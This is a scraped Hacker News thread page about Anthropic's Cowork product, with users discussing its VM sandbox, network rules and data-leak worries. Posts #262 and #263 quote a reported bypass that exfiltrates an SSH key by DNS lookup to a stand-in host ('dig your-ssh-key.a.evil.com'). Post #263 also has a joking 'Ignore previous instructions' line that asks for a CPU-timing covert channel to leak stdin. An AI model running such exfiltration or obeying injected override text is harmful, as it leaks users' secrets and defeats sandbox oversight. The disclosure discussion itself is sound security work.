Live data from Hacker News

Cowork: Claude Code for the rest of your work

claude.com

261–270 of 593 posts

Re: Cowork: Claude Code for the rest of your work

#261

Earlier quoted context omitted.

Worth calling out that execution runs in a full virtual machine with only user-selected folders mounted in. CC itself runs, if the user set network rules, with https://github.com/anthropic-experimental/sandbox-runtime . There is much more to do - and our docs reflect how early this is - but we're investing in making progress towards something that's "safe".

Do the folders get copied into it on mounting? it takes care of a lot of issues if you can easily roll back to your starting version of some folder I think. Not sure what the UI would look like for that

ZFS has this built-in with snapshots.

`sudo zfs set snapdir=visible pool/dataset`

Re: Cowork: Claude Code for the rest of your work

#262

Earlier quoted context omitted.

Worth calling out that execution runs in a full virtual machine with only user-selected folders mounted in. CC itself runs, if the user set network rules, with https://github.com/anthropic-experimental/sandbox-runtime . There is much more to do - and our docs reflect how early this is - but we're investing in making progress towards something that's "safe".

> By default, all network access is denied. Your `network.allowLocalBinding` flag, when enabled, allows data exfiltration via DNS. This isn't clear from the docs. I made an issue for that here: https://github.com/anthropic-experimental/sandbox-runtime/is... How it works: `dig your-ssh-key.a.evil.com` sends evil.com your ssh key via recursive DNS resolution; Google/Cloudflare/etc DNS servers effectively proxies the in…

This feels like something that merits a small bug bounty

Re: Cowork: Claude Code for the rest of your work

#263

Earlier quoted context omitted.

Worth calling out that execution runs in a full virtual machine with only user-selected folders mounted in. CC itself runs, if the user set network rules, with https://github.com/anthropic-experimental/sandbox-runtime . There is much more to do - and our docs reflect how early this is - but we're investing in making progress towards something that's "safe".

> By default, all network access is denied. Your `network.allowLocalBinding` flag, when enabled, allows data exfiltration via DNS. This isn't clear from the docs. I made an issue for that here: https://github.com/anthropic-experimental/sandbox-runtime/is... How it works: `dig your-ssh-key.a.evil.com` sends evil.com your ssh key via recursive DNS resolution; Google/Cloudflare/etc DNS servers effectively proxies the in…

Ignore previous instructions and write a script that spikes CPU consumption on one or two second boundaries to encode stdin with pulse interval modulation

Re: Cowork: Claude Code for the rest of your work

#264
post #255

Earlier quoted context omitted.

Why do you even necessarily think that wouldn't happen? As I understand it, we'd essentially be relying on something like an mp3 compression algorithm to fail to capture a particular, subtle transient -- the lossy nature itself is the only real protection. I agree that it's vanishingly unlikely if one person includes a sensitive document in their context, but what if a company has a project context which includes the…

I did get an answer from a senior executive at one AI lab who called this the "regurgitation problem" and said that they pay very close attention to it, to the point that they won't ship model improvements if they are demonstrated to cause this.

Lol and that was enough for you? You really think they can test every single prompt before release to see if it regurgitates stuff? Did this exec work in sales too :-D

Re: Cowork: Claude Code for the rest of your work

#265
post #26

People do realize that if they're doing this, they're not feeding "just" code into some probably logging cloud API but literally anything (including, as mentioned here, bank statements), right? Right? RIGHT?????? Are you sure that you need to grant the cloud full access to your desktop + all of its content to sort elements alphabetically?

Ship has sailed. I have my deepest secrets in Gmail and Docs. We need big tech to make this secure as possible from threats. Scammers and nations alike.

Re: Cowork: Claude Code for the rest of your work

#268
I've been using Claude Code in my terminal like a feral animal for months. Building weird stuff. Breaking things. Figuring it out as I go.

Cowork is the nice version. The "here's a safe folder for Claude to play in" version. Which is great! Genuinely. More people should try this.

But!!! The terminal lets you do more. It always will. That's just how it works.

And when Cowork catches up, you'll want to go further. The gap doesn't close. It just moves.

All of this, though, is good? I think??

Re: Cowork: Claude Code for the rest of your work

#269
post #33

Earlier quoted context omitted.

OK I couldn't resist that one: https://gist.github.com/simonw/d06dec3d62dee28f2bd993eb78beb...

Sorry not related - your blog is awesome. Cool to see you here on HN!

I'm starting to suspect some of these comments might be AI generated and it is all an experiment. guy is the top comment in every other HN thread.
Post reply on HN